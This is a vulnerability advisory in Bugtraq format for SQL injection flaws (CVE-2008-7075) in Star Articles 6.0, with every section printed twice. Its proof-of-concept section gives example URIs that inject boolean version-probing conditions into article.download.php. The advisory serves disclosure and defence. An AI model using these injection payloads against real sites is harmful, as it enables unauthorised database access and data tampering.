Star Articles Multiple SQL Injection Vulnerabilities
BID:32489
Info
Star Articles Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 32489 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7075 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 26 2008 12:00AM |
| Updated: | Apr 16 2015 05:51PM |
| Credit: | b3hz4d (Seyed Behzad Shaghasemi) |
| Vulnerable: |
Kalptaru Infotech Star Articles 6.0 |
| Not Vulnerable: | |
Discussion
Star Articles Multiple SQL Injection Vulnerabilities
Kalptaru Infotech Star Articles is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Star Articles 6.0 is vulnerable; other versions may also be affected.
Kalptaru Infotech Star Articles is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Star Articles 6.0 is vulnerable; other versions may also be affected.
Exploit / POC
Star Articles Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs and exploit are available:
http://www.example.com/article.download.php/1090%20and%20substring(@@version,1,1)=5
http://www.example.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5
http://www.example.com/article.download.php/1090%20and%20substring(@@version,1,1)=4
http://www.example.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4
Attackers can use a browser to exploit these issues.
The following example URIs and exploit are available:
http://www.example.com/article.download.php/1090%20and%20substring(@@version,1,1)=5
http://www.example.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5
http://www.example.com/article.download.php/1090%20and%20substring(@@version,1,1)=4
http://www.example.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4
Solution / Fix
Star Articles Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Star Articles Multiple SQL Injection Vulnerabilities
References:
References:
- Star Articles Homepage (Kalptaru Infotech)